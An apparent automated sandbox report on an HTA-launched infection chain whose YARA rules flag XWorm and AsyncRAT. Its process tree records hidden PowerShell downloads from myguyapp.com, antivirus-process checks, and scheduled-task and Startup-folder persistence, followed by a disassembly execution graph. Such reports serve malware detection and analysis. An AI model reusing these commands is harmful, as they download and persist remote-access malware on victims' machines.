                                                                      2024-12-16 00:33:10 UTC16384INData Raw: 8e c6 84 cc 36 53 d4 04 f9 57 bb cf dc ae 21 91 54 31 d2 b4 f8 b0 99 26 e7 00 e5 1d ee 47 32 48 4f 22 f1 fd 0e 26 ca 1c 35 53 bc 5a ba 4b 23 61 90 cd ec 16 74 77 9b 62 30 30 da f1 2a 0a d8 92 a2 27 f4 bd cc ee ed 9b 74 f5 54 82 a2 d1 79 26 a2 0b 05 91 0d a8 fb 22 01 6a 8a 78 92 72 82 e0 dc a8 f3 fc d5 0a 40 d6 a9 7e fe 0c c3 d8 ac 8a 35 d6 cf 36 f8 56 e8 8c 34 8c 0b e3 a5 e7 26 fe fc af 1b 5c d7 95 5e 4f 41 7c 6c b1 fe db 60 47 fb 4e 8f fe fb 7d 6c 90 c5 c5 32 f5 f5 78 7e da d0 7e 80 d4 ad 27 b1 d4 53 a7 29 34 ad 46 42 cc af 15 28 9d c2 d0 7e 2e be d9 fb 32 de 6f 28 92 22 70 41 26 b5 a8 36 5f f7 a8 e6 cb 84 ac 31 2b 55 13 8e fc 05 ad 53 a2 18 08 be a3 3a 34 87 94 12 12 1a fb ea ed 74 ad a6 19 2d fa ae 0c 33 50 1c 04 51 1e 18 11 b2 94 05 49 1e 9b 81 6d 95
                                                                      Data Ascii: 6SW!T1&G2HO"&5SZK#atwb00*'tTy&"jxr@~56V4&\^OA|l`GN}l2x~~'S)4FB(~.2o("pA&6_1+US:4t-3PQIm


                                                                      Statistics

                                                                      CPU Usage

                                                                      Click to jump to process

                                                                      Memory Usage

                                                                      Click to jump to process

                                                                      High Level Behavior Distribution

                                                                      Click to dive into process behavior distribution

                                                                      Behavior

                                                                      Click to jump to process

                                                                      System Behavior

                                                                      General

                                                                      Target ID:0
                                                                      Start time:19:32:58
                                                                      Start date:15/12/2024
                                                                      Path:C:\Windows\SysWOW64\mshta.exe
                                                                      Wow64 process (32bit):true
                                                                      Commandline:mshta.exe "C:\Users\user\Desktop\c2.hta"
                                                                      Imagebase:0xf40000
                                                                      File size:13'312 bytes
                                                                      MD5 hash:06B02D5C097C7DB1F109749C45F3F505
                                                                      Has elevated privileges:true
                                                                      Has administrator privileges:true
                                                                      Programmed in:C, C++ or other language
                                                                      Reputation:moderate
                                                                      Has exited:true

                                                                      General

                                                                      Target ID:2
                                                                      Start time:19:33:01
                                                                      Start date:15/12/2024
                                                                      Path:C:\Windows\SysWOW64\cmd.exe
                                                                      Wow64 process (32bit):true
                                                                      Commandline:"C:\Windows\System32\cmd.exe" /c "C:\Users\user\AppData\Local\Temp\temp.bat"
                                                                      Imagebase:0x240000
                                                                      File size:236'544 bytes
                                                                      MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                      Has elevated privileges:true
                                                                      Has administrator privileges:true
                                                                      Programmed in:C, C++ or other language
                                                                      Reputation:high
                                                                      Has exited:true

                                                                      General

                                                                      Target ID:3
                                                                      Start time:19:33:01
                                                                      Start date:15/12/2024
                                                                      Path:C:\Windows\System32\conhost.exe
                                                                      Wow64 process (32bit):false
                                                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                      Imagebase:0x7ff7699e0000
                                                                      File size:862'208 bytes
                                                                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                      Has elevated privileges:true
                                                                      Has administrator privileges:true
                                                                      Programmed in:C, C++ or other language
                                                                      Reputation:high
                                                                      Has exited:true

                                                                      General

                                                                      Target ID:4
                                                                      Start time:19:33:01
                                                                      Start date:15/12/2024
                                                                      Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                      Wow64 process (32bit):true
                                                                      Commandline:powershell -WindowStyle Hidden -Command "Invoke-WebRequest -Uri https://myguyapp.com/f.pdf -OutFile C:\Users\user\AppData\Local\Temp\f.pdf"
                                                                      Imagebase:0xd70000
                                                                      File size:433'152 bytes
                                                                      MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                                                                      Has elevated privileges:true
                                                                      Has administrator privileges:true
                                                                      Programmed in:C, C++ or other language
                                                                      Reputation:high
                                                                      Has exited:true

                                                                      General

                                                                      Target ID:5
                                                                      Start time:19:33:05
                                                                      Start date:15/12/2024
                                                                      Path:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                      Wow64 process (32bit):false
                                                                      Commandline:"C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe" "C:\Users\user\AppData\Local\Temp\f.pdf"
                                                                      Imagebase:0x7ff6bc1b0000
                                                                      File size:5'641'176 bytes
                                                                      MD5 hash:24EAD1C46A47022347DC0F05F6EFBB8C
                                                                      Has elevated privileges:true
                                                                      Has administrator privileges:true
                                                                      Programmed in:C, C++ or other language
                                                                      Reputation:high
                                                                      Has exited:false

                                                                      General

                                                                      Target ID:6
                                                                      Start time:19:33:05
                                                                      Start date:15/12/2024
                                                                      Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                      Wow64 process (32bit):true
                                                                      Commandline:powershell -WindowStyle Hidden -Command "Invoke-WebRequest -Uri https://myguyapp.com/msword.zip -OutFile C:\Users\user\AppData\Local\Temp\msword.zip"
                                                                      Imagebase:0xd70000
                                                                      File size:433'152 bytes
                                                                      MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                                                                      Has elevated privileges:true
                                                                      Has administrator privileges:true
                                                                      Programmed in:C, C++ or other language
                                                                      Reputation:high
                                                                      Has exited:true

                                                                      General

                                                                      Target ID:7
                                                                      Start time:19:33:06
                                                                      Start date:15/12/2024
                                                                      Path:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                                      Wow64 process (32bit):false
                                                                      Commandline:"C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe" --backgroundcolor=16777215
                                                                      Imagebase:0x7ff74bb60000
                                                                      File size:3'581'912 bytes
                                                                      MD5 hash:9B38E8E8B6DD9622D24B53E095C5D9BE
                                                                      Has elevated privileges:true
                                                                      Has administrator privileges:true
                                                                      Programmed in:C, C++ or other language
                                                                      Reputation:high
                                                                      Has exited:false

                                                                      General

                                                                      Target ID:8
                                                                      Start time:19:33:06
                                                                      Start date:15/12/2024
                                                                      Path:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                                      Wow64 process (32bit):false
                                                                      Commandline:"C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --log-severity=disable --user-agent-product="ReaderServices/23.6.20320 Chrome/105.0.0.0" --lang=en-US --user-data-dir="C:\Users\user\AppData\Local\CEF\User Data" --log-file="C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\debug.log" --mojo-platform-channel-handle=2104 --field-trial-handle=1592,i,11903606829876367620,16036057484725814875,131072 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,WinUseBrowserSpellChecker /prefetch:8
                                                                      Imagebase:0x7ff74bb60000
                                                                      File size:3'581'912 bytes
                                                                      MD5 hash:9B38E8E8B6DD9622D24B53E095C5D9BE
                                                                      Has elevated privileges:true
                                                                      Has administrator privileges:true
                                                                      Programmed in:C, C++ or other language
                                                                      Reputation:high
                                                                      Has exited:false

                                                                      General

                                                                      Target ID:12
                                                                      Start time:19:33:16
                                                                      Start date:15/12/2024
                                                                      Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                      Wow64 process (32bit):true
                                                                      Commandline:powershell -WindowStyle Hidden -Command "Expand-Archive -Path C:\Users\user\AppData\Local\Temp\msword.zip -DestinationPath C:\Users\user\AppData\Local\Temp\msword -Force"
                                                                      Imagebase:0xd70000
                                                                      File size:433'152 bytes
                                                                      MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                                                                      Has elevated privileges:true
                                                                      Has administrator privileges:true
                                                                      Programmed in:C, C++ or other language
                                                                      Reputation:high
                                                                      Has exited:true

                                                                      General

                                                                      Target ID:15
                                                                      Start time:19:33:47
                                                                      Start date:15/12/2024
                                                                      Path:C:\Users\user\AppData\Local\Temp\msword\msword.exe
                                                                      Wow64 process (32bit):true
                                                                      Commandline:msword.exe
                                                                      Imagebase:0x400000
                                                                      File size:891'289'591 bytes
                                                                      MD5 hash:C744E054E4EF01832BBF43B81D397B61
                                                                      Has elevated privileges:true
                                                                      Has administrator privileges:true
                                                                      Programmed in:C, C++ or other language
                                                                      Antivirus matches:
                                                                      • Detection: 8%, ReversingLabs
                                                                      Reputation:low
                                                                      Has exited:true

                                                                      General

                                                                      Target ID:16
                                                                      Start time:19:33:47
                                                                      Start date:15/12/2024
                                                                      Path:C:\Windows\SysWOW64\cmd.exe
                                                                      Wow64 process (32bit):true
                                                                      Commandline:"C:\Windows\System32\cmd.exe" /c "C:\Users\user\AppData\Local\Temp\cleanup.bat"
                                                                      Imagebase:0x240000
                                                                      File size:236'544 bytes
                                                                      MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                      Has elevated privileges:true
                                                                      Has administrator privileges:true
                                                                      Programmed in:C, C++ or other language
                                                                      Has exited:true

                                                                      General

                                                                      Target ID:17
                                                                      Start time:19:33:47
                                                                      Start date:15/12/2024
                                                                      Path:C:\Windows\System32\conhost.exe
                                                                      Wow64 process (32bit):false
                                                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                      Imagebase:0x7ff7699e0000
                                                                      File size:862'208 bytes
                                                                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                      Has elevated privileges:true
                                                                      Has administrator privileges:true
                                                                      Programmed in:C, C++ or other language
                                                                      Has exited:true

                                                                      General

                                                                      Target ID:18
                                                                      Start time:19:33:47
                                                                      Start date:15/12/2024
                                                                      Path:C:\Windows\SysWOW64\timeout.exe
                                                                      Wow64 process (32bit):true
                                                                      Commandline:timeout /t 90
                                                                      Imagebase:0xd50000
                                                                      File size:25'088 bytes
                                                                      MD5 hash:976566BEEFCCA4A159ECBDB2D4B1A3E3
                                                                      Has elevated privileges:true
                                                                      Has administrator privileges:true
                                                                      Programmed in:C, C++ or other language
                                                                      Has exited:true

                                                                      General

                                                                      Target ID:19
                                                                      Start time:19:33:48
                                                                      Start date:15/12/2024
                                                                      Path:C:\Windows\SysWOW64\cmd.exe
                                                                      Wow64 process (32bit):true
                                                                      Commandline:"C:\Windows\System32\cmd.exe" /c copy Phpbb Phpbb.bat & Phpbb.bat
                                                                      Imagebase:0x240000
                                                                      File size:236'544 bytes
                                                                      MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                      Has elevated privileges:true
                                                                      Has administrator privileges:true
                                                                      Programmed in:C, C++ or other language
                                                                      Has exited:true

                                                                      General

                                                                      Target ID:20
                                                                      Start time:19:33:48
                                                                      Start date:15/12/2024
                                                                      Path:C:\Windows\System32\conhost.exe
                                                                      Wow64 process (32bit):false
                                                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                      Imagebase:0x7ff7699e0000
                                                                      File size:862'208 bytes
                                                                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                      Has elevated privileges:true
                                                                      Has administrator privileges:true
                                                                      Programmed in:C, C++ or other language
                                                                      Has exited:true

                                                                      General

                                                                      Target ID:21
                                                                      Start time:19:33:49
                                                                      Start date:15/12/2024
                                                                      Path:C:\Windows\SysWOW64\tasklist.exe
                                                                      Wow64 process (32bit):true
                                                                      Commandline:tasklist
                                                                      Imagebase:0x600000
                                                                      File size:79'360 bytes
                                                                      MD5 hash:0A4448B31CE7F83CB7691A2657F330F1
                                                                      Has elevated privileges:true
                                                                      Has administrator privileges:true
                                                                      Programmed in:C, C++ or other language
                                                                      Has exited:true

                                                                      General

                                                                      Target ID:22
                                                                      Start time:19:33:49
                                                                      Start date:15/12/2024
                                                                      Path:C:\Windows\SysWOW64\findstr.exe
                                                                      Wow64 process (32bit):true
                                                                      Commandline:findstr /I "wrsa opssvc"
                                                                      Imagebase:0x800000
                                                                      File size:29'696 bytes
                                                                      MD5 hash:F1D4BE0E99EC734376FDE474A8D4EA3E
                                                                      Has elevated privileges:true
                                                                      Has administrator privileges:true
                                                                      Programmed in:C, C++ or other language
                                                                      Has exited:true

                                                                      General

                                                                      Target ID:23
                                                                      Start time:19:33:49
                                                                      Start date:15/12/2024
                                                                      Path:C:\Windows\SysWOW64\tasklist.exe
                                                                      Wow64 process (32bit):true
                                                                      Commandline:tasklist
                                                                      Imagebase:0x600000
                                                                      File size:79'360 bytes
                                                                      MD5 hash:0A4448B31CE7F83CB7691A2657F330F1
                                                                      Has elevated privileges:true
                                                                      Has administrator privileges:true
                                                                      Programmed in:C, C++ or other language
                                                                      Has exited:true

                                                                      General

                                                                      Target ID:24
                                                                      Start time:19:33:49
                                                                      Start date:15/12/2024
                                                                      Path:C:\Windows\SysWOW64\findstr.exe
                                                                      Wow64 process (32bit):true
                                                                      Commandline:findstr -I "avastui avgui bdservicehost nswscsvc sophoshealth"
                                                                      Imagebase:0x800000
                                                                      File size:29'696 bytes
                                                                      MD5 hash:F1D4BE0E99EC734376FDE474A8D4EA3E
                                                                      Has elevated privileges:true
                                                                      Has administrator privileges:true
                                                                      Programmed in:C, C++ or other language
                                                                      Has exited:true

                                                                      General

                                                                      Target ID:25
                                                                      Start time:19:33:50
                                                                      Start date:15/12/2024
                                                                      Path:C:\Windows\SysWOW64\cmd.exe
                                                                      Wow64 process (32bit):true
                                                                      Commandline:cmd /c md 220239
                                                                      Imagebase:0x240000
                                                                      File size:236'544 bytes
                                                                      MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                      Has elevated privileges:true
                                                                      Has administrator privileges:true
                                                                      Programmed in:C, C++ or other language
                                                                      Has exited:true

                                                                      General

                                                                      Target ID:26
                                                                      Start time:19:33:50
                                                                      Start date:15/12/2024
                                                                      Path:C:\Windows\SysWOW64\findstr.exe
                                                                      Wow64 process (32bit):true
                                                                      Commandline:findstr /V "DimPieLilHot" Statistical
                                                                      Imagebase:0x800000
                                                                      File size:29'696 bytes
                                                                      MD5 hash:F1D4BE0E99EC734376FDE474A8D4EA3E
                                                                      Has elevated privileges:true
                                                                      Has administrator privileges:true
                                                                      Programmed in:C, C++ or other language
                                                                      Has exited:true

                                                                      General

                                                                      Target ID:27
                                                                      Start time:19:33:50
                                                                      Start date:15/12/2024
                                                                      Path:C:\Windows\SysWOW64\cmd.exe
                                                                      Wow64 process (32bit):true
                                                                      Commandline:cmd /c copy /b ..\Response + ..\Fires + ..\Automatic F
                                                                      Imagebase:0x240000
                                                                      File size:236'544 bytes
                                                                      MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                      Has elevated privileges:true
                                                                      Has administrator privileges:true
                                                                      Programmed in:C, C++ or other language
                                                                      Has exited:true

                                                                      General

                                                                      Target ID:28
                                                                      Start time:19:33:50
                                                                      Start date:15/12/2024
                                                                      Path:C:\Users\user\AppData\Local\Temp\220239\Carter.pif
                                                                      Wow64 process (32bit):true
                                                                      Commandline:Carter.pif F
                                                                      Imagebase:0xfe0000
                                                                      File size:893'608 bytes
                                                                      MD5 hash:18CE19B57F43CE0A5AF149C96AECC685
                                                                      Has elevated privileges:true
                                                                      Has administrator privileges:true
                                                                      Programmed in:C, C++ or other language
                                                                      Yara matches:
                                                                      • Rule: JoeSecurity_XWorm, Description: Yara detected XWorm, Source: 0000001C.00000003.3316786960.0000000003C5F000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                      • Rule: MALWARE_Win_AsyncRAT, Description: Detects AsyncRAT, Source: 0000001C.00000003.3316786960.0000000003C5F000.00000004.00000800.00020000.00000000.sdmp, Author: ditekSHen
                                                                      • Rule: JoeSecurity_XWorm, Description: Yara detected XWorm, Source: 0000001C.00000003.3316786960.0000000003C81000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                      • Rule: MALWARE_Win_AsyncRAT, Description: Detects AsyncRAT, Source: 0000001C.00000003.3316786960.0000000003C81000.00000004.00000800.00020000.00000000.sdmp, Author: ditekSHen
                                                                      • Rule: JoeSecurity_XWorm, Description: Yara detected XWorm, Source: 0000001C.00000003.3316937916.0000000003C51000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                      • Rule: MALWARE_Win_AsyncRAT, Description: Detects AsyncRAT, Source: 0000001C.00000003.3316937916.0000000003C51000.00000004.00000800.00020000.00000000.sdmp, Author: ditekSHen
                                                                      • Rule: JoeSecurity_XWorm, Description: Yara detected XWorm, Source: 0000001C.00000003.3261819598.00000000015E5000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                      • Rule: MALWARE_Win_AsyncRAT, Description: Detects AsyncRAT, Source: 0000001C.00000003.3261819598.00000000015E5000.00000004.00000800.00020000.00000000.sdmp, Author: ditekSHen
                                                                      • Rule: JoeSecurity_XWorm, Description: Yara detected XWorm, Source: 0000001C.00000003.3316904176.0000000003CB2000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                      • Rule: MALWARE_Win_AsyncRAT, Description: Detects AsyncRAT, Source: 0000001C.00000003.3316904176.0000000003CB2000.00000004.00000800.00020000.00000000.sdmp, Author: ditekSHen
                                                                      • Rule: JoeSecurity_XWorm, Description: Yara detected XWorm, Source: 0000001C.00000003.3316786960.0000000003C71000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                      • Rule: MALWARE_Win_AsyncRAT, Description: Detects AsyncRAT, Source: 0000001C.00000003.3316786960.0000000003C71000.00000004.00000800.00020000.00000000.sdmp, Author: ditekSHen
                                                                      Antivirus matches:
                                                                      • Detection: 8%, ReversingLabs
                                                                      Has exited:false

                                                                      General

                                                                      Target ID:29
                                                                      Start time:19:33:50
                                                                      Start date:15/12/2024
                                                                      Path:C:\Windows\SysWOW64\choice.exe
                                                                      Wow64 process (32bit):true
                                                                      Commandline:choice /d y /t 5
                                                                      Imagebase:0xb10000
                                                                      File size:28'160 bytes
                                                                      MD5 hash:FCE0E41C87DC4ABBE976998AD26C27E4
                                                                      Has elevated privileges:true
                                                                      Has administrator privileges:true
                                                                      Programmed in:C, C++ or other language
                                                                      Has exited:true

                                                                      General

                                                                      Target ID:30
                                                                      Start time:19:33:51
                                                                      Start date:15/12/2024
                                                                      Path:C:\Windows\SysWOW64\cmd.exe
                                                                      Wow64 process (32bit):true
                                                                      Commandline:cmd /c schtasks.exe /create /tn "Wagner" /tr "wscript //B 'C:\Users\user\AppData\Local\CloudSynergy Solutions\DanielPulse.js'" /sc minute /mo 5 /F
                                                                      Imagebase:0x240000
                                                                      File size:236'544 bytes
                                                                      MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                      Has elevated privileges:false
                                                                      Has administrator privileges:false
                                                                      Programmed in:C, C++ or other language
                                                                      Has exited:true

                                                                      General

                                                                      Target ID:31
                                                                      Start time:19:33:51
                                                                      Start date:15/12/2024
                                                                      Path:C:\Windows\System32\conhost.exe
                                                                      Wow64 process (32bit):false
                                                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                      Imagebase:0x7ff7699e0000
                                                                      File size:862'208 bytes
                                                                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                      Has elevated privileges:false
                                                                      Has administrator privileges:false
                                                                      Programmed in:C, C++ or other language
                                                                      Has exited:true

                                                                      General

                                                                      Target ID:32
                                                                      Start time:19:33:51
                                                                      Start date:15/12/2024
                                                                      Path:C:\Windows\SysWOW64\schtasks.exe
                                                                      Wow64 process (32bit):true
                                                                      Commandline:schtasks.exe /create /tn "Wagner" /tr "wscript //B 'C:\Users\user\AppData\Local\CloudSynergy Solutions\DanielPulse.js'" /sc minute /mo 5 /F
                                                                      Imagebase:0x380000
                                                                      File size:187'904 bytes
                                                                      MD5 hash:48C2FE20575769DE916F48EF0676A965
                                                                      Has elevated privileges:false
                                                                      Has administrator privileges:false
                                                                      Programmed in:C, C++ or other language
                                                                      Has exited:true

                                                                      General

                                                                      Target ID:33
                                                                      Start time:19:33:51
                                                                      Start date:15/12/2024
                                                                      Path:C:\Windows\SysWOW64\cmd.exe
                                                                      Wow64 process (32bit):true
                                                                      Commandline:cmd /k echo [InternetShortcut] > "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\DanielPulse.url" & echo URL="C:\Users\user\AppData\Local\CloudSynergy Solutions\DanielPulse.js" >> "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\DanielPulse.url" & exit
                                                                      Imagebase:0x240000
                                                                      File size:236'544 bytes
                                                                      MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                      Has elevated privileges:false
                                                                      Has administrator privileges:false
                                                                      Programmed in:C, C++ or other language
                                                                      Has exited:true

                                                                      General

                                                                      Target ID:34
                                                                      Start time:19:33:51
                                                                      Start date:15/12/2024
                                                                      Path:C:\Windows\System32\conhost.exe
                                                                      Wow64 process (32bit):false
                                                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                      Imagebase:0x7ff7699e0000
                                                                      File size:862'208 bytes
                                                                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                      Has elevated privileges:false
                                                                      Has administrator privileges:false
                                                                      Programmed in:C, C++ or other language
                                                                      Has exited:true

                                                                      General

                                                                      Target ID:35
                                                                      Start time:19:33:52
                                                                      Start date:15/12/2024
                                                                      Path:C:\Windows\System32\wscript.exe
                                                                      Wow64 process (32bit):false
                                                                      Commandline:C:\Windows\system32\wscript.EXE //B "C:\Users\user\AppData\Local\CloudSynergy Solutions\DanielPulse.js"
                                                                      Imagebase:0x7ff63a320000
                                                                      File size:170'496 bytes
                                                                      MD5 hash:A47CBE969EA935BDD3AB568BB126BC80
                                                                      Has elevated privileges:false
                                                                      Has administrator privileges:false
                                                                      Programmed in:C, C++ or other language
                                                                      Has exited:true

                                                                      General

                                                                      Target ID:36
                                                                      Start time:19:33:52
                                                                      Start date:15/12/2024
                                                                      Path:C:\Users\user\AppData\Local\CloudSynergy Solutions\DanielPulse.scr
                                                                      Wow64 process (32bit):true
                                                                      Commandline:"C:\Users\user\AppData\Local\CloudSynergy Solutions\DanielPulse.scr" "C:\Users\user\AppData\Local\CloudSynergy Solutions\R"
                                                                      Imagebase:0x830000
                                                                      File size:893'608 bytes
                                                                      MD5 hash:18CE19B57F43CE0A5AF149C96AECC685
                                                                      Has elevated privileges:false
                                                                      Has administrator privileges:false
                                                                      Programmed in:C, C++ or other language
                                                                      Antivirus matches:
                                                                      • Detection: 8%, ReversingLabs
                                                                      Has exited:true

                                                                      General

                                                                      Target ID:37
                                                                      Start time:19:34:03
                                                                      Start date:15/12/2024
                                                                      Path:C:\Windows\System32\wscript.exe
                                                                      Wow64 process (32bit):false
                                                                      Commandline:"C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\CloudSynergy Solutions\DanielPulse.js"
                                                                      Imagebase:0x7ff63a320000
                                                                      File size:170'496 bytes
                                                                      MD5 hash:A47CBE969EA935BDD3AB568BB126BC80
                                                                      Has elevated privileges:false
                                                                      Has administrator privileges:false
                                                                      Programmed in:C, C++ or other language
                                                                      Has exited:true

                                                                      General

                                                                      Target ID:38
                                                                      Start time:19:34:03
                                                                      Start date:15/12/2024
                                                                      Path:C:\Users\user\AppData\Local\CloudSynergy Solutions\DanielPulse.scr
                                                                      Wow64 process (32bit):true
                                                                      Commandline:"C:\Users\user\AppData\Local\CloudSynergy Solutions\DanielPulse.scr" "C:\Users\user\AppData\Local\CloudSynergy Solutions\R"
                                                                      Imagebase:0x8b0000
                                                                      File size:893'608 bytes
                                                                      MD5 hash:18CE19B57F43CE0A5AF149C96AECC685
                                                                      Has elevated privileges:false
                                                                      Has administrator privileges:false
                                                                      Programmed in:C, C++ or other language
                                                                      Has exited:true

                                                                      General

                                                                      Target ID:40
                                                                      Start time:19:35:35
                                                                      Start date:15/12/2024
                                                                      Path:C:\Users\user\AppData\Local\Temp\220239\RegAsm.exe
                                                                      Wow64 process (32bit):true
                                                                      Commandline:C:\Users\user\AppData\Local\Temp\220239\RegAsm.exe
                                                                      Imagebase:0x4e0000
                                                                      File size:65'440 bytes
                                                                      MD5 hash:0D5DF43AF2916F47D00C1573797C1A13
                                                                      Has elevated privileges:true
                                                                      Has administrator privileges:true
                                                                      Programmed in:C, C++ or other language
                                                                      Yara matches:
                                                                      • Rule: JoeSecurity_XWorm, Description: Yara detected XWorm, Source: 00000028.00000002.4141599623.00000000005C2000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                      • Rule: MALWARE_Win_AsyncRAT, Description: Detects AsyncRAT, Source: 00000028.00000002.4141599623.00000000005C2000.00000040.00000400.00020000.00000000.sdmp, Author: ditekSHen
                                                                      • Rule: JoeSecurity_XWorm, Description: Yara detected XWorm, Source: 00000028.00000002.4146462832.0000000002871000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                      Antivirus matches:
                                                                      • Detection: 0%, ReversingLabs
                                                                      Has exited:false

                                                                      Disassembly

                                                                      Reset < >

                                                                        Execution Graph

                                                                        Execution Coverage:17.8%
                                                                        Dynamic/Decrypted Code Coverage:0%
                                                                        Signature Coverage:20.7%
                                                                        Total number of Nodes:1526
                                                                        Total number of Limit Nodes:33
                                                                        execution_graph 4342 402fc0 4343 401446 18 API calls 4342->4343 4344 402fc7 4343->4344 4345 403017 4344->4345 4346 40300a 4344->4346 4349 401a13 4344->4349 4347 406805 18 API calls 4345->4347 4348 401446 18 API calls 4346->4348 4347->4349 4348->4349 4350 4023c1 4351 40145c 18 API calls 4350->4351 4352 4023c8 4351->4352 4355 40726a 4352->4355 4358 406ed2 CreateFileW 4355->4358 4359 406f04 4358->4359 4360 406f1e ReadFile 4358->4360 4361 4062a3 11 API calls 4359->4361 4362 4023d6 4360->4362 4365 406f84 4360->4365 4361->4362 4363 4071e3 CloseHandle 4363->4362 4364 406f9b ReadFile lstrcpynA lstrcmpA 4364->4365 4366 406fe2 SetFilePointer ReadFile 4364->4366 4365->4362 4365->4363 4365->4364 4369 406fdd 4365->4369 4366->4363 4367 4070a8 ReadFile 4366->4367 4368 407138 4367->4368 4368->4367 4368->4369 4370 40715f SetFilePointer GlobalAlloc ReadFile 4368->4370 4369->4363 4371 4071a3 4370->4371 4372 4071bf lstrcpynW GlobalFree 4370->4372 4371->4371 4371->4372 4372->4363 4373 401cc3 4374 40145c 18 API calls 4373->4374 4375 401cca lstrlenW 4374->4375 4376 4030dc 4375->4376 4377 4030e3 4376->4377 4379 405f51 wsprintfW 4376->4379 4379->4377 4394 401c46 4395 40145c 18 API calls 4394->4395 4396 401c4c 4395->4396 4397 4062a3 11 API calls 4396->4397 4398 401c59 4397->4398 4399 406c9b 81 API calls 4398->4399 4400 401c64 4399->4400 4401 403049 4402 401446 18 API calls 4401->4402 4405 403050 4402->4405 4403 406805 18 API calls 4404 401a13 4403->4404 4405->4403 4405->4404 4406 40204a 4407 401446 18 API calls 4406->4407 4408 402051 IsWindow 4407->4408 4409 4018d3 4408->4409 4410 40324c 4411 403277 4410->4411 4412 40325e SetTimer 4410->4412 4413 4032cc 4411->4413 4414 403291 MulDiv wsprintfW SetWindowTextW SetDlgItemTextW 4411->4414 4412->4411 4414->4413 4415 4048cc 4416 4048f1 4415->4416 4417 4048da 4415->4417 4419 4048ff IsWindowVisible 4416->4419 4423 404916 4416->4423 4418 4048e0 4417->4418 4433 40495a 4417->4433 4420 403daf SendMessageW 4418->4420 4422 40490c 4419->4422 4419->4433 4424 4048ea 4420->4424 4421 404960 CallWindowProcW 4421->4424 4434 40484e SendMessageW 4422->4434 4423->4421 4439 406009 lstrcpynW 4423->4439 4427 404945 4440 405f51 wsprintfW 4427->4440 4429 40494c 4430 40141d 80 API calls 4429->4430 4431 404953 4430->4431 4441 406009 lstrcpynW 4431->4441 4433->4421 4435 404871 GetMessagePos ScreenToClient SendMessageW 4434->4435 4436 4048ab SendMessageW 4434->4436 4437 4048a3 4435->4437 4438 4048a8 4435->4438 4436->4437 4437->4423 4438->4436 4439->4427 4440->4429 4441->4433 4442 4022cc 4443 40145c 18 API calls 4442->4443 4444 4022d3 4443->4444 4445 4062d5 2 API calls 4444->4445 4446 4022d9 4445->4446 4447 4022e8 4446->4447 4451 405f51 wsprintfW 4446->4451 4450 4030e3 4447->4450 4452 405f51 wsprintfW 4447->4452 4451->4447 4452->4450 4222 4050cd 4223 405295 4222->4223 4224 4050ee GetDlgItem GetDlgItem GetDlgItem 4222->4224 4225 4052c6 4223->4225 4226 40529e GetDlgItem CreateThread CloseHandle 4223->4226 4271 403d98 SendMessageW 4224->4271 4228 4052f4 4225->4228 4230 4052e0 ShowWindow ShowWindow 4225->4230 4231 405316 4225->4231 4226->4225 4274 405047 83 API calls 4226->4274 4232 405352 4228->4232 4234 405305 4228->4234 4235 40532b ShowWindow 4228->4235 4229 405162 4242 406805 18 API calls 4229->4242 4273 403d98 SendMessageW 4230->4273 4236 403dca 8 API calls 4231->4236 4232->4231 4237 40535d SendMessageW 4232->4237 4238 403d18 SendMessageW 4234->4238 4240 40534b 4235->4240 4241 40533d 4235->4241 4239 40528e 4236->4239 4237->4239 4244 405376 CreatePopupMenu 4237->4244 4238->4231 4243 403d18 SendMessageW 4240->4243 4245 404f72 25 API calls 4241->4245 4246 405181 4242->4246 4243->4232 4247 406805 18 API calls 4244->4247 4245->4240 4248 4062a3 11 API calls 4246->4248 4250 405386 AppendMenuW 4247->4250 4249 40518c GetClientRect GetSystemMetrics SendMessageW 